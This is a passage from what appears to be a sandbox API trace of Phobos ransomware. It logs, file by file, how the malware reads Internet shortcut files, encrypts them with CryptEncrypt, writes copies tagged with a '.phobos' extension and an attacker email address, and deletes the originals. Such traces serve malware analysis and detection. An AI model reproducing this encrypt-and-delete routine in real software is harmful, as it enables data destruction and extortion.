returned 0x178 [0205.039] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.039] CloseHandle (hObject=0x178) returned 1 [0205.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url")) returned 0x20 [0205.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.040] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.040] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.041] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.041] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.041] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.042] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.042] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.042] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.042] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.042] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.042] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.042] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.042] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.042] CloseHandle (hObject=0x178) returned 1 [0205.043] CloseHandle (hObject=0x124) returned 1 [0205.043] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url")) returned 1 [0205.043] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.066] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.066] CloseHandle (hObject=0x124) returned 1 [0205.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url")) returned 0x20 [0205.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.067] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.067] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.068] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.068] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.068] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.068] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.069] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.069] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0205.069] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.069] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0205.069] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.069] CloseHandle (hObject=0x124) returned 1 [0205.069] CloseHandle (hObject=0x178) returned 1 [0205.069] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url")) returned 1 [0205.070] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.071] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.071] CloseHandle (hObject=0x178) returned 1 [0205.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url")) returned 0x20 [0205.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.072] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.072] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.072] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.073] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.073] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.073] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.073] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.074] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.074] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.074] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.074] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.074] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.075] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.075] CloseHandle (hObject=0x178) returned 1 [0205.075] CloseHandle (hObject=0x124) returned 1 [0205.075] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url")) returned 1 [0205.076] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.077] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.077] CloseHandle (hObject=0x124) returned 1 [0205.077] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url")) returned 0x20 [0205.077] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.077] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.077] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.078] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.078] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.078] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.079] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.079] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.080] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.080] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.080] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.080] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.080] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.080] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.080] CloseHandle (hObject=0x124) returned 1 [0205.080] CloseHandle (hObject=0x178) returned 1 [0205.080] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url")) returned 1 [0205.081] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.136] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=134) returned 1 [0205.136] CloseHandle (hObject=0xfc) returned 1 [0205.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url")) returned 0x20 [0205.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.137] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.137] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.139] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.139] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.139] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x86, lpOverlapped=0x0) returned 1 [0205.139] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.139] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.140] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.140] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.140] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.140] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.140] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.140] CloseHandle (hObject=0xfc) returned 1 [0205.141] CloseHandle (hObject=0x178) returned 1 [0205.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url")) returned 1 [0205.141] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.145] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.145] CloseHandle (hObject=0x178) returned 1 [0205.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url")) returned 0x20 [0205.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.145] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.145] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN 